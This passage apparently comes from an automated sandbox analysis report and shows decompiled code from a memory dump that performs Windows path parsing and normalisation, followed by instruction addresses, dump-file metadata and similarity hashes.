																	_t363 = ( *(_t425 + 4))[_t445] & 0x0000ffff;
																	if(_t363 == 0x5c) {
																		L44:
																		if(_t422 == 0) {
																			L46:
																			 *(_t386 + _t422 * 2) = 0x5c;
																			_t422 = _t422 + 1;
																			_v96 = _t422;
																			L43:
																			_t445 = _t445 + 1;
																			_v76 = _t445;
																			continue;
																		}
																		if( *((short*)(_t386 + _t422 * 2 - 2)) == 0x5c) {
																			goto L43;
																		}
																		goto L46;
																	}
																	_t365 = _t363 - 0x2e;
																	if(_t365 == 0) {
																		_t126 = _t445 + 1; // 0x2
																		_t366 = _t126;
																		_v104 = _t366;
																		if(_t366 == _t435) {
																			goto L43;
																		}
																		_t367 =  *(_t425 + 4);
																		_t440 =  *(_t367 + 2 + _t445 * 2) & 0x0000ffff;
																		_v108 = _t440;
																		_t435 = _v120;
																		if(_t440 != 0x5c) {
																			if(_v108 == 0x2f) {
																				goto L83;
																			}
																			if(_v108 != 0x2e) {
																				L35:
																				while(_t445 < _t435) {
																					_t369 = ( *(_t425 + 4))[_t445] & 0x0000ffff;
																					if(_t369 == 0x5c || _t369 == 0x2f) {
																						if(_t445 < _t435) {
																							if(_t422 >= 2) {
																								if( *((short*)(_t386 + _t422 * 2 - 2)) == 0x2e) {
																									if( *((short*)(_t386 + _t422 * 2 - 4)) != 0x2e) {
																										_t422 = _t422 - 1;
																										_v96 = _t422;
																									}
																								}
																							}
																						}
																						break;
																					} else {
																						 *(_t386 + _t422 * 2) = _t369;
																						_t422 = _t422 + 1;
																						_v96 = _t422;
																						_t445 = _t445 + 1;
																						_v76 = _t445;
																						continue;
																					}
																				}
																				_t445 = _t445 - 1;
																				_v76 = _t445;
																				goto L43;
																			}
																			_t155 = _t445 + 2; // 0x3
																			_t425 = _v88;
																			if(_t155 == _t435) {
																				while(1) {
																					L103:
																					if(_t422 < _v80) {
																						break;
																					}
																					 *(_t386 + _t422 * 2) = 0;
																					_t425 = _v88;
																					if( *(_t386 + _t422 * 2) != 0x5c) {
																						_t422 = _t422 - 1;
																						_v96 = _t422;
																						continue;
																					} else {
																						goto L105;
																					}
																					while(1) {
																						L105:
																						if(_t422 < _v80) {
																							goto L180;
																						}
																						 *(_t386 + _t422 * 2) = 0;
																						_t435 = _v120;
																						if( *(_t386 + _t422 * 2) == 0x5c) {
																							if(_t422 < _v80) {
																								goto L180;
																							}
																							L110:
																							_t445 = _t445 + 1;
																							_v76 = _t445;
																							goto L43;
																						}
																						_t422 = _t422 - 1;
																						_v96 = _t422;
																					}
																					break;
																				}
																				L180:
																				_t422 = _t422 + 1;
																				_v96 = _t422;
																				goto L110;
																			}
																			_t375 =  *(_t367 + 4 + _t445 * 2) & 0x0000ffff;
																			if(_t375 != 0x5c) {
																				if(_t375 != 0x2f) {
																					goto L35;
																				}
																			}
																			goto L103;
																		}
																		L83:
																		_t445 = _v104;
																		_v76 = _t445;
																		goto L43;
																	}
																	if(_t365 == 1) {
																		goto L44;
																	} else {
																		goto L35;
																	}
																}
																_t449 = _v80;
																if(_v57 != 0) {
																	if(_t422 > _t449) {
																		if( *((short*)(_t386 + _t422 * 2 - 2)) == 0x5c) {
																			_t422 = _t422 - 1;
																			_v96 = _t422;
																		}
																	}
																}
																_t439 = _v92;
																if(_t422 >= _v92) {
																	L52:
																	if(_t422 == 0) {
																		L56:
																		_t425 = _t422 + _t422;
																		_v52 = _t425;
																		if(_v112 != 0) {
																			_t357 = _t422;
																			while(1) {
																				_v100 = _t357;
																				if(_t357 == 0) {
																					break;
																				}
																				if( *((short*)(_t386 + _t357 * 2 - 2)) == 0x5c) {
																					break;
																				}
																				_t357 = _t357 - 1;
																			}
																			if(_t357 >= _t422) {
																				L113:
																				 *_v112 = 0;
																				goto L57;
																			}
																			if(_t357 < _t449) {
																				goto L113;
																			}
																			 *_v112 = _t386 + _t357 * 2;
																		}
																		L57:
																		_t446 = _t425 & 0x0000ffff;
																		_v64 = _t446;
																		goto L58;
																	}
																	_t422 = _t422 - 1;
																	_v96 = _t422;
																	_t360 =  *(_t386 + _t422 * 2) & 0x0000ffff;
																	if(_t360 == 0x20) {
																		goto L51;
																	}
																	if(_t360 == 0x2e) {
																		goto L51;
																	}
																	_t422 = _t422 + 1;
																	_v96 = _t422;
																	goto L56;
																} else {
																	L51:
																	 *(_t386 + _t422 * 2) = 0;
																	goto L52;
																}
																L69:
																if( *((short*)(_t386 + _t420 * 2)) == 0x2f) {
																	 *((short*)(_t386 + _t420 * 2)) = 0x5c;
																}
																_t420 = _t420 + 1;
																_v100 = _t420;
																_t352 = _v56;
																goto L28;
															}
															_t446 = _t417 & 0x0000ffff;
															_v64 = _t446;
															_t439 = _v92;
															goto L58;
														}
														if(_v116 > 8) {
															goto L26;
														}
														_t446 = 0xa;
														_v64 = 0xa;
														_t439 = _v92;
														goto L58;
													}
													L72:
													if(_t415 > 0xffff) {
														_t446 = 0;
													}
													_v64 = _t446;
													_t439 = _v92;
													goto L58;
												}
												L26:
												_t352 = _v56;
												goto L27;
											}
										}
										_t379 = _t336[2] & 0x0000ffff;
										if(_t379 != 0x5c) {
											if(_t379 == 0x2f) {
												goto L22;
											}
											goto L98;
										}
										L22:
										_t337 = 2;
									}
									goto L23;
								}
								_t450 =  *_t336 & 0x0000ffff;
								if(_t450 == 0x5c || _t450 == 0x2f) {
									if(_t407 < 4) {
										L132:
										_t337 = 4;
										goto L23;
									}
									_t451 = _t336[1] & 0x0000ffff;
									if(_t451 != 0x5c) {
										if(_t451 == 0x2f) {
											goto L87;
										}
										goto L132;
									}
									L87:
									if(_t407 < 6) {
										L135:
										_t337 = 1;
										goto L23;
									}
									_t452 = _t336[2] & 0x0000ffff;
									if(_t452 != 0x2e) {
										if(_t452 == 0x3f) {
											goto L89;
										}
										goto L135;
									}
									L89:
									if(_t407 < 8) {
										L134:
										_t337 = ((0 | _t407 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
										goto L23;
									}
									_t384 = _t336[3] & 0x0000ffff;
									if(_t384 != 0x5c) {
										if(_t384 == 0x2f) {
											goto L91;
										}
										goto L134;
									}
									L91:
									_t337 = 6;
									goto L23;
								} else {
									goto L17;
								}
							}
						}
					}
					goto L124;
				}
			}

0x1e3c6e30
0x1e3c6e35
0x1e3c6e37
0x1e3c6e3c
0x1e3c6e47
0x1e3c6e4b
0x1e3c6e50
0x1e3c6e53
0x1e3c6e55
0x1e3c6e5b
0x1e3c6e5f
0x1e3c6e65
0x1e3c6e68
0x1e3c6e6a
0x1e3c6e6d
0x1e3c6e70
0x1e3c6e73
0x1e3c6e76
0x1e3c6e79
0x1e3c6e7c
0x1e3c6e7f
0x1e3c6e84
0x1e3c710f
0x1e3c710f
0x1e3c6e8c
0x1e3c6e8e
0x1e3c6e8e
0x1e3c6e97
0x1e40f5d3
0x1e40f5d3
0x1e3c6e9d
0x1e3c6ea3
0x1e3c6eaa
0x1e3c6ead
0x1e3c6eb2
0x1e3c6eb4
0x1e3c6eb7
0x1e3c7466
0x1e3c7466
0x00000000
0x1e3c6ebd
0x1e3c6ebd
0x1e3c6ec4
0x1e3c6eca
0x1e3c6ecc
0x1e3c6ecf
0x1e3c6ed2
0x1e3c6ede
0x1e40f5df
0x1e40f5e0
0x00000000
0x1e40f5e0
0x1e3c6ee6
0x00000000
0x00000000
0x1e3c6eec
0x1e3c6ef3
0x1e3c7181
0x1e3c6f02
0x1e3c6f02
0x1e3c6f02
0x1e3c6f0b
0x1e3c6f0d
0x1e3c6f10
0x1e3c6f17
0x1e3c6f21
0x1e3c6f24
0x1e3c6f2d
0x1e3c6f31
0x1e3c6f36
0x1e3c6f3d
0x1e3c7413
0x1e3c7416
0x1e3c7419
0x1e3c741c
0x1e3c7421
0x1e3c742b
0x1e3c742b
0x1e3c742e
0x1e3c7439
0x1e40f60b
0x1e40f60b
0x1e40f615
0x1e40f619
0x1e3c743f
0x1e3c7447
0x1e3c7454
0x1e3c745a
0x1e3c745f
0x1e3c745f
0x00000000
0x1e3c7439
0x1e3c7425
0x1e40f5e9
0x1e40f5ed
0x1e40f5f4
0x00000000
0x00000000
0x1e40f5fd
0x00000000
0x00000000
0x1e40f603
0x1e40f603
0x00000000
0x1e3c6f43
0x1e3c6f43
0x1e3c6f45
0x1e3c6f48
0x1e3c6f4e
0x1e3c6f65
0x1e3c6f68
0x1e3c721f
0x1e3c6f83
0x1e3c6f86
0x1e3c72dc
0x1e3c72dc
0x1e3c6f9e
0x1e3c6fa1
0x1e3c6fa3
0x1e3c6fa5
0x1e3c6fa8
0x1e3c6fab
0x1e3c6fae
0x1e3c6fb1
0x1e3c6fb4
0x1e3c6fb6
0x1e3c6fb9
0x1e3c6fbf
0x1e3c718a
0x1e3c718e
0x1e40f831
0x1e40f831
0x1e40f833
0x1e40f836
0x00000000
0x1e40f836
0x1e3c7194
0x00000000
0x1e40f658
0x1e40f658
0x1e40f65a
0x1e40f65d
0x1e40f662
0x1e40f662
0x1e40f665
0x1e40f667
0x00000000
0x00000000
0x1e40f669
0x1e40f66c
0x1e40f670
0x1e40f673
0x1e40f67a
0x1e40f67a
0x1e40f67b
0x1e40f67e
0x1e40f681
0x00000000
0x00000000
0x1e40f683
0x1e40f683
0x00000000
0x1e40f683
0x1e40f675
0x1e40f678
0x00000000
0x00000000
0x00000000
0x1e40f678
0x1e40f686
0x1e40f688
0x1e40f68b
0x1e40f68e
0x1e40f691
0x1e40f694
0x1e40f698
0x1e40f69c
0x1e40f6a0
0x00000000
0x00000000
0x00000000
0x00000000
0x1e3c7397
0x1e3c739c
0x1e3c739f
0x1e3c73a3
0x1e3c73a5
0x1e40f6bb
0x1e40f6c1
0x1e40f6c4
0x1e3c73ab
0x1e3c73ab
0x1e3c73ab
0x1e3c73b1
0x1e3c73b5
0x1e3c73ba
0x1e3c73c0
0x1e3c73c3
0x1e3c73c7
0x1e3c73cc
0x1e3c73d0
0x1e3c73d3
0x1e40f6cc
0x1e40f6d4
0x1e40f6d9
0x1e40f6dd
0x1e40f6e1
0x1e40f6e5
0x1e40f6f0
0x1e40f6fc
0x1e40f700
0x1e40f709
0x1e40f70e
0x1e40f710
0x1e40f784
0x1e40f788
0x1e40f78b
0x1e40f78e
0x1e40f790
0x1e40f792
0x1e40f795
0x1e40f798
0x1e40f7b7
0x1e40f7b7
0x1e40f7ba
0x1e40f7ba
0x00000000
0x1e40f7ba
0x1e40f79a
0x1e40f79d
0x00000000
0x00000000
0x1e40f79f
0x1e40f7a4
0x1e40f7a7
0x1e40f7ab
0x1e40f7ae
0x1e40f7b1
0x00000000
0x1e40f7b1
0x1e40f712
0x1e40f717
0x1e40f74c
0x1e40f74e
0x1e40f752
0x1e40f756
0x1e40f75d
0x1e40f761
0x1e40f764
0x1e40f76c
0x1e40f771
0x1e40f775
0x1e40f778
0x1e40f77c
0x00000000
0x1e40f77c
0x1e40f719
0x1e40f71d
0x1e40f720
0x1e40f723
0x1e40f726
0x1e40f729
0x1e40f72e
0x1e40f740
0x1e40f744
0x00000000
0x1e40f744
0x1e40f730
0x1e40f732
0x1e40f735
0x1e40f738
0x00000000
0x1e3c73d9
0x1e3c73d9
0x1e3c73db
0x1e3c73de
0x1e3c73e1
0x1e3c73e4
0x1e3c73e7
0x1e3c73ea
0x1e3c73ef
0x1e3c73f2
0x1e3c73f6
0x1e3c73f9
0x1e3c73f9
0x1e3c73fe
0x1e3c7401
0x1e3c7406
0x1e3c7409
0x00000000
0x1e3c7409
0x00000000
0x1e40f7c5
0x1e40f7ca
0x1e40f7cd
0x1e40f7d1
0x1e40f7d3
0x1e40f7da
0x1e40f7e0
0x1e40f7e3
0x1e40f7e3
0x1e40f7e6
0x1e40f7d5
0x1e40f7d5
0x1e40f7d5
0x1e40f7e9
0x1e40f7eb
0x1e40f7f0
0x1e40f7f3
0x1e40f7f5
0x1e40f7f8
0x1e40f7fb
0x1e40f7fe
0x1e40f801
0x1e40f80f
0x1e40f814
0x1e40f803
0x1e40f803
0x1e40f806
0x1e40f806
0x00000000
0x00000000
0x1e3c719d
0x1e3c71a2
0x1e3c71a5
0x1e3c71a9
0x1e3c71ab
0x1e40f826
0x1e40f829
0x1e3c71b1
0x1e3c71b1
0x1e3c71ba
0x1e3c71ba
0x1e3c71bf
0x1e3c71c5
0x1e3c71cf
0x1e3c71d2
0x1e3c71d8
0x1e3c71dd
0x1e3c71e4
0x1e3c71e7
0x00000000
0x00000000
0x1e3c7275
0x1e3c727a
0x1e3c727d
0x1e3c727f
0x1e3c7282
0x1e3c7284
0x1e40f6a8
0x1e40f6aa
0x1e40f6aa
0x1e3c728a
0x1e3c728f
0x1e3c7292
0x1e3c7297
0x1e3c729a
0x1e3c729d
0x1e3c72a0
0x1e3c72a5
0x1e3c72a9
0x1e3c72ac
0x1e3c72af
0x1e3c72b2
0x1e3c72b5
0x1e3c72b7
0x1e3c72ba
0x1e3c72be
0x1e3c72be
0x1e3c72c2
0x1e3c72c5
0x1e3c72c8
0x1e40f6b2
0x1e40f6b2
0x00000000
0x00000000
0x1e3c6fc5
0x1e3c6fc5
0x1e3c6fcc
0x1e3c6fd8
0x1e3c6fda
0x1e3c6fdd
0x1e3c6fe3
0x1e3c7162
0x1e40f845
0x00000000
0x00000000
0x1e40f84e
0x1e40f8c4
0x1e40f8c8
0x1e40f8cb
0x1e40f8ce
0x1e3c70e0
0x1e3c70e0
0x1e3c70e3
0x1e3c70e3
0x1e3c70ea
0x1e3c70ef
0x1e3c70f1
0x1e3c70f4
0x1e3c70fc
0x1e3c70fd
0x1e3c70fe
0x1e3c710c
0x1e3c710c
0x1e40f850
0x1e40f858
0x1e40f87a
0x1e40f88a
0x1e40f88d
0x1e40f890
0x1e40f893
0x1e40f895
0x1e40f898
0x1e40f8a4
0x1e40f8ad
0x1e40f8b0
0x1e40f8b3
0x1e40f8b3
0x1e40f8a4
0x1e3c6fec
0x1e3c6fec
0x1e3c6fee
0x00000000
0x1e3c6ff1
0x1e3c6ff8
0x00000000
0x1e3c6ffe
0x1e3c7004
0x1e3c7006
0x1e3c7006
0x1e3c7010
0x1e3c7017
0x1e3c701e
0x1e3c7072
0x1e3c7074
0x1e3c707e
0x1e3c7083
0x1e3c7087
0x1e3c7088
0x1e3c706c
0x1e3c706c
0x1e3c706d
0x00000000
0x1e3c706d
0x1e3c707c
0x00000000
0x00000000
0x00000000
0x1e3c707c
0x1e3c7020
0x1e3c7023
0x1e3c71ef
0x1e3c71ef
0x1e3c71f2
0x1e3c71f7
0x00000000
0x00000000
0x1e3c71fd
0x1e3c7200
0x1e3c7205
0x1e3c720b
0x1e3c720e
0x1e3c72eb
0x00000000
0x00000000
0x1e3c72f6
0x00000000
0x1e3c7030
0x1e3c7037
0x1e3c703e
0x1e3c7055
0x1e3c705a
0x1e3c7062
0x1e40f908
0x1e40f90e
0x1e40f90f
0x1e40f90f
0x1e40f908
0x1e3c7062
0x1e3c705a
0x00000000
0x1e3c7045
0x1e3c7045
0x1e3c7049
0x1e3c704a
0x1e3c704d
0x1e3c704e
0x00000000
0x1e3c704e
0x1e3c703e
0x1e3c7068
0x1e3c7069
0x00000000
0x1e3c7069
0x1e3c72fc
0x1e3c7301
0x1e3c7304
0x1e3c7314
0x1e3c7314
0x1e3c7319
0x00000000
0x00000000
0x1e3c7325
0x1e3c732d
0x1e3c7330
0x1e3c7356
0x1e3c7357
0x00000000
0x00000000
0x00000000
0x00000000
0x1e3c7332
0x1e3c7332
0x1e3c7337
0x00000000
0x00000000
0x1e3c7343
0x1e3c734b
0x1e3c734e
0x1e3c7361
0x00000000
0x00000000
0x1e3c7367
0x1e3c7367
0x1e3c7368
0x00000000
0x1e3c7368
0x1e3c7350
0x1e3c7351
0x1e3c7351
0x00000000
0x1e3c7332
0x1e40f8f9
0x1e40f8f9
0x1e40f8fa
0x00000000
0x1e40f8fa
0x1e3c7306
0x1e3c730e
0x1e40f8ee
0x00000000
0x00000000
0x1e40f8f4
0x00000000
0x1e3c730e
0x1e3c7214
0x1e3c7214
0x1e3c7217
0x00000000
0x1e3c7217
0x1e3c702c
0x00000000
0x00000000
0x00000000
0x00000000
0x1e3c702c
0x1e3c708d
0x1e3c7094
0x1e3c7098
0x1e3c70a0
0x1e3c738c
0x1e3c738d
0x1e3c738d
0x1e3c70a0
0x1e3c7098
0x1e3c70a6
0x1e3c70ab
0x1e3c70b3
0x1e3c70b5
0x1e3c70cd
0x1e3c70cd
0x1e3c70d0
0x1e3c70d8
0x1e3c711a
0x1e3c711c
0x1e3c711c
0x1e3c7121
0x00000000
0x00000000
0x1e3c7129
0x00000000
0x00000000
0x1e3c712b
0x1e3c712b
0x1e3c7130
0x1e3c737e
0x1e3c7381
0x00000000
0x1e3c7381
0x1e3c7138
0x00000000
0x00000000
0x1e3c7144
0x1e3c7144
0x1e3c70da
0x1e3c70da
0x1e3c70dd
0x00000000
0x1e3c70dd
0x1e3c70b7
0x1e3c70b8
0x1e3c70bb
0x1e3c70c2
0x00000000
0x00000000
0x1e3c70c7
0x00000000
0x00000000
0x1e3c70c9
0x1e3c70ca
0x00000000
0x1e3c70ad
0x1e3c70ad
0x1e3c70af
0x00000000
0x1e3c70af
0x1e3c7148
0x1e3c714d
0x1e40f8e2
0x1e40f8e2
0x1e3c7153
0x1e3c7154
0x1e3c7157
0x00000000
0x1e3c7157
0x1e40f87c
0x1e40f87f
0x1e40f882
0x00000000
0x1e40f882
0x1e40f85e
0x00000000
0x00000000
0x1e40f864
0x1e40f869
0x1e40f86c
0x00000000
0x1e40f86c
0x1e3c7168
0x1e3c7170
0x1e40f8d6
0x1e40f8d6
0x1e3c7176
0x1e3c7179
0x00000000
0x1e3c7179
0x1e3c6fe9
0x1e3c6fe9
0x00000000
0x1e3c6fe9
0x1e3c6fbf
0x1e3c6f8c
0x1e3c6f93
0x1e3c72d6
0x00000000
0x00000000
0x00000000
0x1e3c72d6
0x1e3c6f99
0x1e3c6f99
0x1e3c6f99
0x00000000
0x1e3c6f68
0x1e3c6f50
0x1e3c6f56
0x1e3c722c
0x1e40f629
0x1e40f629
0x00000000
0x1e40f629
0x1e3c7232
0x1e3c7239
0x1e40f623
0x00000000
0x00000000
0x00000000
0x1e40f623
0x1e3c723f
0x1e3c7242
0x1e40f64e
0x1e40f64e
0x00000000
0x1e40f64e
0x1e3c7248
0x1e3c724f
0x1e3c7373
0x00000000
0x00000000
0x00000000
0x1e3c7379
0x1e3c7255
0x1e3c7258
0x1e40f63c
0x1e40f648
0x00000000
0x1e40f648
0x1e3c725e
0x1e3c7265
0x1e40f636
0x00000000
0x00000000
0x00000000
0x1e40f636
0x1e3c726b
0x1e3c726b
0x00000000
0x00000000
0x00000000
0x00000000
0x1e3c6f56
0x1e3c6f3d
0x1e3c6ed2
0x00000000
0x1e3c6ec4

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4f3f1333a6b7045ddd3406b43c66c3274ad1e15d379a113b8c7713791bb22cc
Instruction ID: f20ac5a1e9a6253d37313d1204386e45cc3efbb22e9c79a707fb6e88634d4e77
Opcode Fuzzy Hash: e4f3f1333a6b7045ddd3406b43c66c3274ad1e15d379a113b8c7713791bb22cc
Instruction Fuzzy Hash: C2027B71D142698BCB25CFA9C4906ADB7B6BF44700F21436FE816AB294E770DC92CB90

Uniqueness

Uniqueness Score: -1.00%

Function 1E3C4120, Relevance: .4, Instructions: 444
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E1E3C4120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				char _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x1e49d360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E1E3DF232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E1E3C6E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L1E3C4620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E1E3C6E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M1E3C45F8))) {
												case 0:
													_v568 = 0x1e381078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x1e3811c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L1E3C4620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E1E3EF720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E1E3EF720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E1E3A52A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E1E3BEB70(1, 0x1e4979a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E1E3BAA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E1E3E95D0();
																			L1E3C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L1E3C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
